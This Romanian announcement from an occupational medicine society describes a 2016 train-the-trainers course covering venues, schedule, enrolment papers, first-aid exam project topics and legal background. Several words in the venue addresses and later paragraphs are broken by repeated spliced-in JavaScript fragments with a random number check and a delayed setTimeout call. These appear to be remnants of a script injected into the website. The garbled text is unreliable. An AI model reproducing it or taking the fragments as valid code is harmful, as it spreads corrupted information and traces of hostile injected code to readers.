Detalii privind CURSUL “FORMARE DE FORMATORI” (COD COR: 242401)

Societatea romana de medicina a muncii

www.srmedicina-muncii.ro

Perioada cursului:

  • BUCURESTI – 6- 9 OCTOMBRIE 2016
  • BUCURESTI – 13- 16 OCTOMBRIE 2016
  • BUCURESTI – 20- 23 OCTOMBRIE 2016
  • CLUJ- NAPOCA – 27- 30 OCTOMBRIE 2016.

Locaţia cursului: BUCURESTI: Clădirea de birouri UZINEXPORT BUSINESS CENTER, situată în Blvd. Iancu de Hunedoara, Nr. 8. Personalul de la recepţie vă va îndruma către sala de curs. Ca şi puncte de reper: locaţia se află la aproximativ 100 de metri faţă de Piaţa Victoriei, mergând către Spitalul Grigore Alexandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andrescu, oarecum vis a vis faţă de clădirea Guvernului. CLUJ- NAPOCA: HOTEL TRANSILVANIA: Strada Regele Ferdinandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and, Nr. 20. Personalul de la recepţie vă va îndruma către sala de curs.

Programul de studiu este următorul: Joi: între 11.00- 18.00 , cu două pauze de cafea Vineri: între 9.00- 18.00, cu două pauze de cafea Sâmbătă: între 9.00- 18.00, cu două pauze de cafea Duminică: începând cu ora 10.00 are loc examenul, cuprinzând o probă scrisă (test grilă) şi prezentarea practică în faţa Comisiei de Examinare. Pe întreaga perioadă a cursului şi a pauzelor, personalul Target Active Training se va afla la dispoziţia dumneavoastră pentru consultanţă individuală. Suportul de curs este printat, dar anumite părţi de bibliografie vor fi pe suport electronic. În sala de curs va exista un info- point, cu posibilitatea de acces la sisteme informatice. Dar, dacă nu vă este prea dificil, puteţi veni cu laptopul propriu.

Componenţa Dosarului personal de înscriere la curs, dosar obligatoriu, în vederea eliberării certificatului (certificarea este agreată de Ministerul Muncii şi Ministerul Educaţiei): -Copie Carte de Identitate -Copie Certificat de Naştere şi Certificat de căsătorie (dacă este cazul) -Copie Diplomă de licenţă/master/absolvire studii superioare Aceste documente vor fi predate în prima zi de curs formatorilor.
Referitor la Proiectul Individual, proba practică a examenului, vă propun ca, în masura în care aveţi puţin timp la dispoziţie, să începeţi a-l construi.

Pornind de la premisa că, ulterior abilitării ca formator, veţi organiza cursuri de prim ajutor în întreprinderi cu profiluri diverse, am primit acceptul ca proiectul individual al examenului să fie reprezentat de organizarea unui curs de instruire într-una din temele: 1. Resuscitarea cardio-respiratorie. 2. Poziţia de siguranţă. 3. Electrocuţia. 4. Înecul. 5. Expunerea la condiţii de macroclimat cald: Insolaţia. 6. Expunerea la frig: Degerătura. 7. Fractura. 8. Arsurile tegumentelor, arsurile oculare. 9. Obstrucţia căilor respiratorii superioare (manevra Heimlich). 10. Atitudinea la constatarea unui accident de muncă (gestionarea evenimentului) Temele propuse nu sunt obligatorii, în situaţia în care aveţi o altă idee puteţi să o dezvoltaţi pe aceea.

Proiectul trebuie să conţină 3- 6 slide-uri, în suport electronic sau printate. Scopul proiectului individual este să prezentaţi în faţa comisiei şi a colegilor de curs un „minicurs de prim ajutor” prin care să îi învăţaţi cum să acţioneze în acel caz sau situaţie dată. Puteţi construi un scenariu punctual, de exmplu: „Curs de prim ajutor- resuscitarea cardio-respiratorie, publicul ţintă fiind muncitorii unui şantier de construcţii.”

Pentru o notă de spectaculozitate a proiectului, promit să aduc si să vă pun la dispoziţie, pentru prezentare, un manechin– trunchi ca suport practic. Şi vă spun şi de unde îl puteţi achiziţiona ulterior!

GRUPE DE CURS – FORMARE DE FORMATORI

Vă stau la dispoziţie pentru orice nelămuriri, precizări, solicitări suplimentare, sau orice informaţii consideraţi că vă sunt necesare.

Cu deosebită consideraţie, Dr. Iulia CRULL secretar S.R.M.M. tel: 0745 110 180

PROIECT „FORMARE DE FORMATORI”

Aparut ca o necesitate obiectiva in procesul de dezvoltare profesionala a medicilor specialisti de medicina muncii, in perioada imediat urmatoare, Societatea Romana de Medicina Muncii demareaza proiectul “Formare de formatori”, proiect coordonat de sef lucrari doctor Claudia Mariana HANDRA.

Se vor organiza patru sesiuni:

  • Bucuresti: in perioada 06- 09 octombrie 2016.
  • Bucuresti: in perioada 13 – 16 octombrie 2016.
  • Bucuresti: in perioada 20 23 octombrie 2016.
  • Cluj Napoca: in perioada 27- 30 octombrie 2016.

Proiectul „Formare de Formatori” va aduce abilitati specifice si competente suplimentare in activitatea dumneavoastra. Conform legii 418/2004, privind statutul medicului de medicina muncii : „Medicul de medicina muncii organizeaza primul ajutor si tratamentul de urgenta si instruieste angajatii cu privire la aplicarea metodelor accesibile lor de prim ajutor si a procedurilor de urgenta, daca are competenta in acest sens”.

Competenta o dobandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anditi prin cele doua cursuri:

 

1.Cursul de formator: finalizat cu eliberarea documentului – Certificat de formator (autorizat de catre Consiliul National de Formare Profesionala al Adultilor – C.N.F.P.A.). Urmare atestarii ca formator autorizat C.N.F.P.A. puteti la random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andul dumneavoastra a sustine orice curs daca aveti competenta in acel domeniu (conform legislatiei date de Autoritatea Nationala pentru Calificari).

 

2.Cursul de prim ajutor: reinnoit la fiecare 5 ani, va ofera competenta in domeniul acordarii primului ajutor. Protocoalele de resuscitare se actualizeaza la 5 ani (ultima data a fost actualizat in 2015). Pentru a evita ca diferite persoane sa predea dupa protocoale vechi, aceasta competenta se reinnoieste la fiecare 5 ani. Aceasta regula este mentinuta de Consiliul European de Resuscitare la care si Romania este parte.

Cursurile de prim ajutor organizate in conformitate cu Legea 319/2006 se adreseaza persoanelor fara pregatire medicala, precum si periodic celor care au fost deja instruite in acordarea primului ajutor. Prin intermediul acestor cursuri de prim ajutor, ii veti invata cum sa recunoasca situatiile de urgenta, cum sa le trateze, ce nu trebuie sa faca si cum sa mentina in viata victimele pana la sosirea echipajelor de urgenta. Cursurile trebuie sa respecte ultimele protocoale de interventie in acordarea primului ajutor, elaborate de catre Consiliul European de Resuscitare, de aceea competentele se reinoiesc periodic, la fiecare 5 ani.

De asemenea, fiind formator autorizat C.N.F.P.A., puteti organiza si alte cursuri, de exmplu de ergonomie, promovarea sanatatii la locul de munca s.a.

 

Va asteptam sa participati la acest proiect !

Cu deosebita consideratie,

Dr. Iulia Crull

secretar S.R.M.M.